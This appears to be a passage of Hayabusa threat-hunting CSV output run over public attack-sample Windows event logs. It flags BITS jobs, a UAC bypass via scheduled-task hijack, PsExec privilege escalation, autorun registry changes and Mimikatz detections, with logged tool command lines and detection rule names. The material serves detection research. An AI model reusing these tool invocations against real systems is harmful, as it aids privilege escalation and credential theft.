http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/43/42/e0b8b1fb7c27acac43c236b9f6b029b07f2a3b661b5d8eed22848180aaf4f04e.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:08.126 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/KbGq9i1aCJZgbOKmNv6oJQ_6252/VL8i_VzJSassyW3AF-YJHg,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:17.194 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/ONVXH2AuMZGs-h196MV_Rg_2505/bYFE7q-GLInSBxc008hucw,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:21.164 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/APhHMzuprJvS7ixvnAk_gdI_1/anGnv31dmOJhheXBnYQ3gw,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:25.377 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AJqZYiqGvCtix64S2N84g-M_2020.11.2.164946/EWvH2e-LS80S29cxzuTfRA,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:34.726 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Z0dgM6Cm_Rt2z0LEtvtuMA_2020.11.16.1201/AIpG92DElyR2vE9pGKmvVoc,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:50:16.788 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1begCn.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:50:17.148 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 00:54:58.415 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 00:54:59.449 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 01:00:56.714 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bdETn.img?w=100&h=100&m=6&tilesize=medium&x=1080&y=363&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 01:00:57.346 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:46:03.984 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bgw4d.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:46:04.676 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:52:42.355 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:52:43.097 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 20:05:14.300 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bh3sJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 21:44:11.565 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 21:46:56.224 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 21:46:56.973 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 23:09:10.403 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhxvH.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 00:34:38.147 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhAo3.img?w=100&h=100&m=6&tilesize=medium&x=1228&y=258&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 00:41:52.668 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhEQI.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 21:47:56.181 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 21:47:57.912 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 06:06:52.429 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aV2sK.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 08:55:56.229 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bkiYw.img?w=100&h=100&m=6&tilesize=medium&x=1094&y=441&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 18:56:29.274 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/gkmgaooipdjhmangpemjhigmamcehddo/86.249.200/84.243.200/17f6e5d11e18da93834a470f7266ede269d3660ac7a4c31c0d0acdb0c4c34ba2.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 18:57:51.221 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AN67dIUbQty67HoEacsJ61c_6260/APHk7sg8XbALFcVmjTty4CQ,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 18:57:59.420 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Jo7Lnj2MkXB5ezNave49dw_2509/AOHc3HV2drrDzlxLOXeJFhs,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 23:04:33.703 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 23:04:36.013 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,informational,Process Creation,"Command: pocacct.exe payload.dll : Path: C:\Users\lgreen\Downloads\PrivEsc\pocacct.exe : User: 3B\lgreen : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 19:45:14.007 +09:00,02694w-win10.threebeesco.com,1,informational,Process Creation,Command: C:\WINDOWS\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\WINDOWS\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 22:23:30.614 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-26 22:23:32.141 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: byeintegrity5-uac.exe : Path: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-27 02:38:11.154 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: taskhostw.exe $(Arg0) : Path: C:\Windows\System32\taskhostw.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-27 02:38:11.175 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: taskhostw.exe $(Arg0)",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-28 05:15:22.956 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-28 05:15:23.662 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 01:17:33.019 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 01:17:34.712 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 21:31:21.179 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 21:31:22.012 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-30 01:29:22.597 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bsJv4.img?w=100&h=100&m=6&tilesize=medium&x=3175&y=1599&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-30 22:15:33.442 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:04.542 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:04.545 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\psexecprivesc.exe"" C:\Windows\System32\mspaint.exe : Path: C:\Users\Public\psexecprivesc.exe : User: MSEDGEWIN10\user02 : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\PSEXESVC.exe : Path: C:\Windows\PSEXESVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,PsExec Service Start,,rules/sigma/process_creation/win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,PsExec Tool Execution,,rules/sigma/process_creation/process_creation_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:45.141 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mspaint.exe"" 췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍 : Path: C:\Windows\System32\mspaint.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\PSEXESVC.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 20:18:54.600 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-10 20:18:54.856 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-10 20:18:54.856 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimidrv.sys : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz 